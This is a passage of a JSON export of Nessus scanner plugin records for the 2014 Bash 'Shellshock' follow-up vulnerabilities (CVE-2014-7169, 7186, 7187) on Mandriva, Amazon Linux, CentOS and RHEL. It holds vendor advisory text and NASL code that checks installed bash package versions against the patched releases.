script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"bash-4.2-48.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"bash-doc-4.2-48.1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:10:15", "description": "GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution.\n\nNOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271 and this bulletin is a follow-up to ALAS-2014-418.\n\nIt was discovered that the fixed-sized redir_stack could be forced to overflow in the Bash parser, resulting in memory corruption, and possibly leading to arbitrary code execution when evaluating untrusted input that would not otherwise be run as code.\n\nAn off-by-one error was discovered in the way Bash was handling deeply nested flow control constructs. Depending on the layout of the .bss segment, this could allow arbitrary execution of code that would not otherwise be executed by Bash.\n\nSpecial notes :\n\nBecause of the exceptional nature of this security event, we have backfilled our 2014.03, 2013.09, and 2013.03 Amazon Linux AMI repositories with new bash packages that also fix both CVE-2014-7169 and CVE-2014-6271 .\n\nFor 2014.09 Amazon Linux AMIs, 'bash-4.1.2-15.21.amzn1' addresses both CVEs. Running 'yum clean all' followed by 'yum update bash' will install the fixed package.\n\nFor Amazon Linux AMIs 'locked' to the 2014.03 repositories, 'bash-4.1.2-15.21.amzn1' also addresses both CVEs. Running 'yum clean all' followed by 'yum update bash' will install the fixed package.\n\nFor Amazon Linux AMIs 'locked' to the 2013.09 or 2013.03 repositories, 'bash-4.1.2-15.18.22.amzn1' addresses both CVEs. Running 'yum clean all' followed by 'yum update bash' will install the fixed package.\n\nFor Amazon Linux AMIs 'locked' to the 2012.09, 2012.03, or 2011.09 repositories, run 'yum clean all' followed by 'yum\n--releasever=2013.03 update bash' to install only the updated bash package.\n\nIf you are using a pre-2011.09 Amazon Linux AMI, then you are using a version of the Amazon Linux AMI that was part of our public beta, and we encourage you to move to a newer version of the Amazon Linux AMI as soon as possible.", "cvss3": {"score": null, "vector": null}, "published": "2014-10-12T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : bash (ALAS-2014-419)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:bash", "p-cpe:/a:amazon:linux:bash-debuginfo", "p-cpe:/a:amazon:linux:bash-doc", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2014-419.NASL", "href": "https://www.tenable.com/plugins/nessus/78362", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-419.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78362);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\");\n script_xref(name:\"ALAS\", value:\"2014-419\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Amazon Linux AMI : bash (ALAS-2014-419)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux AMI host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"GNU Bash through 4.3 bash43-025 processes trailing strings after\ncertain malformed function definitions in the values of environment\nvariables, which allows remote attackers to write to files or possibly\nhave unknown other impact via a crafted environment, as demonstrated\nby vectors involving the ForceCommand feature in OpenSSH sshd, the\nmod_cgi and mod_cgid modules in the Apache HTTP Server, scripts\nexecuted by unspecified DHCP clients, and other situations in which\nsetting the environment occurs across a privilege boundary from Bash\nexecution.\n\nNOTE: this vulnerability exists because of an incomplete fix for\nCVE-2014-6271 and this bulletin is a follow-up to ALAS-2014-418.\n\nIt was discovered that the fixed-sized redir_stack could be forced to\noverflow in the Bash parser, resulting in memory corruption, and\npossibly leading to arbitrary code execution when evaluating untrusted\ninput that would not otherwise be run as code.\n\nAn off-by-one error was discovered in the way Bash was handling deeply\nnested flow control constructs. Depending on the layout of the .bss\nsegment, this could allow arbitrary execution of code that would not\notherwise be executed by Bash.\n\nSpecial notes :\n\nBecause of the exceptional nature of this security event, we have\nbackfilled our 2014.03, 2013.09, and 2013.03 Amazon Linux AMI\nrepositories with new bash packages that also fix both CVE-2014-7169\nand CVE-2014-6271 .\n\nFor 2014.09 Amazon Linux AMIs, 'bash-4.1.2-15.21.amzn1' addresses both\nCVEs. Running 'yum clean all' followed by 'yum update bash' will\ninstall the fixed package.\n\nFor Amazon Linux AMIs 'locked' to the 2014.03 repositories,\n'bash-4.1.2-15.21.amzn1' also addresses both CVEs. Running 'yum clean\nall' followed by 'yum update bash' will install the fixed package.\n\nFor Amazon Linux AMIs 'locked' to the 2013.09 or 2013.03 repositories,\n'bash-4.1.2-15.18.22.amzn1' addresses both CVEs. Running 'yum clean\nall' followed by 'yum update bash' will install the fixed package.\n\nFor Amazon Linux AMIs 'locked' to the 2012.09, 2012.03, or 2011.09\nrepositories, run 'yum clean all' followed by 'yum\n--releasever=2013.03 update bash' to install only the updated bash\npackage.\n\nIf you are using a pre-2011.09 Amazon Linux AMI, then you are using a\nversion of the Amazon Linux AMI that was part of our public beta, and\nwe encourage you to move to a newer version of the Amazon Linux AMI as\nsoon as possible.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://aws.amazon.com/amazon-linux-ami/faqs/#lock\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/ALAS-2014-418.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/ALAS-2014-419.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update bash' to update your system. Note that you may need to\nrun 'yum clean all' first.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"bash-4.1.2-15.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"bash-debuginfo-4.1.2-15.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"bash-doc-4.1.2-15.21.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-debuginfo / bash-doc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:09:23", "description": "Updated bash packages that fix one security issue are now available for Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language interpreter compatible with the Bourne shell (sh). Bash is the default shell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables. An attacker could potentially use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables need to be made aware of changes to the way names are handled by this update. For more information see the Knowledgebase article at https://access.redhat.com/articles/1200223\n\nNote: Docker users are advised to use 'yum update' within their containers, and to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the aforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "CentOS 5 / 6 / 7 : bash (CESA-2014:1306)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:centos:centos:bash", "p-cpe:/a:centos:centos:bash-doc", "cpe:/o:centos:centos:5", "cpe:/o:centos:centos:6", "cpe:/o:centos:centos:7"], "id": "CENTOS_RHSA-2014-1306.NASL", "href": "https://www.tenable.com/plugins/nessus/77879", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:1306 and \n# CentOS Errata and Security Advisory 2014:1306 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77879);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\");\n script_bugtraq_id(70137, 70152, 70154);\n script_xref(name:\"RHSA\", value:\"2014:1306\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"CentOS 5 / 6 / 7 : bash (CESA-2014:1306)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote CentOS host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Updated bash packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash\nstill allowed certain characters to be injected into other\nenvironments via specially crafted environment variables. An attacker\ncould potentially use this flaw to override or bypass environment\nrestrictions to execute shell commands. Certain services and\napplications allow remote unauthenticated attackers to provide\nenvironment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nApplications which directly create bash functions as environment\nvariables need to be made aware of changes to the way names are\nhandled by this update. For more information see the Knowledgebase\narticle at https://access.redhat.com/articles/1200223\n\nNote: Docker users are advised to use 'yum update' within their\ncontainers, and to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer\nto the aforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n # http://lists.centos.org/pipermail/centos-announce/2014-September/020593.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3e6f3298\");\n # http://lists.centos.org/pipermail/centos-announce/2014-September/020592.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7dcec836\");\n # http://lists.centos.org/pipermail/centos-announce/2014-September/020651.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d96a66d4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CentOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/CentOS/release\");\nif (! version) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (ereg(string:version, pattern:\"release 5\\.([0-9]([^0-9]|$)|10([^0-9]|$))\", icase: 1))\n{\n #CentOS release 5.0-5.10\n if (rpm_check(release:\"CentOS-5\", reference:\"bash-3.2-33.el5_10.4\")) flag++;\n}\nelse \n{\n #CentOS release 5.11\n if (rpm_check(release:\"CentOS-5\", reference:\"bash-3.2-33.el5_11.4\")) flag++;\n}\n\nif (rpm_check(release:\"CentOS-6\", reference:\"bash-4.1.2-15.el6_5.2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"bash-doc-4.1.2-15.el6_5.2\")) flag++;\n\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"bash-4.2.45-5.el7_0.4\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"bash-doc-4.2.45-5.el7_0.4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:09:25", "description": "[Updated September 30, 2014] This advisory has been updated with information on restarting system services after applying this update.\nNo changes have been made to the original packages.\n\nUpdated bash packages that fix one security issue are now available for Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language interpreter compatible with the Bourne shell (sh). Bash is the default shell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables. An attacker could potentially use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables need to be made aware of changes to the way names are handled by this update. Note that certain services, screen sessions, and tmux sessions may need to be restarted, and affected interactive users may need to re-login. Installing these updated packages without restarting services will address the vulnerability, but functionality may be impacted until affected services are restarted. For more information see the Knowledgebase article at https://access.redhat.com/articles/1200223\n\nNote: Docker users are advised to use 'yum update' within their containers, and to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the aforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "RHEL 5 / 6 / 7 : bash (RHSA-2014:1306)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:bash", "p-cpe:/a:redhat:enterprise_linux:bash-debuginfo", "p-cpe:/a:redhat:enterprise_linux:bash-doc", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.5", "cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:7.3", "cpe:/o:redhat:enterprise_linux:7.4", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:7.6", "cpe:/o:redhat:enterprise_linux:7.7"], "id": "REDHAT-RHSA-2014-1306.NASL", "href": "https://www.tenable.com/plugins/nessus/77895", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:1306. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77895);\n script_version(\"1.38\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\");\n script_bugtraq_id(70137, 70152, 70154);\n script_xref(name:\"RHSA\", value:\"2014:1306\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"RHEL 5 / 6 / 7 : bash (RHSA-2014:1306)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"[Updated September 30, 2014] This advisory has been updated with\ninformation on restarting system services after applying this update.\nNo changes have been made to the original packages.\n\nUpdated bash packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash\nstill allowed certain characters to be injected into other\nenvironments via specially crafted environment variables. An attacker\ncould potentially use this flaw to override or bypass environment\nrestrictions to execute shell commands. Certain services and\napplications allow remote unauthenticated attackers to provide\nenvironment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nApplications which directly create bash functions as environment\nvariables need to be made aware of changes to the way names are\nhandled by this update. Note that certain services, screen sessions,\nand tmux sessions may need to be restarted, and affected interactive\nusers may need to re-login. Installing these updated packages without\nrestarting services will address the vulnerability, but functionality\nmay be impacted until affected services are restarted. For more\ninformation see the Knowledgebase article at\nhttps://access.redhat.com/articles/1200223\n\nNote: Docker users are advised to use 'yum update' within their\ncontainers, and to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer\nto the aforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/articles/1200223\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2014:1306\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-7169\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-7186\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-7187\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash, bash-debuginfo and / or bash-doc packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:1306\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"bash-3.2-33.el5_11.4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bash-3.2-33.el5_11.4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"bash-3.2-33.el5_11.4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"bash-debuginfo-3.2-33.el5_11.4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bash-debuginfo-3.2-33.el5_11.4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"bash-debuginfo-3.2-33.el5_11.4\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"bash-4.1.2-15.el6_5.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"bash-4.1.2-15.el6_5.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"bash-4.1.2-15.el6_5.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"bash-debuginfo-4.1.2-15.el6_5.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"bash-debuginfo-4.1.2-15.el6_5.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"bash-debuginfo-4.1.2-15.el6_5.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", 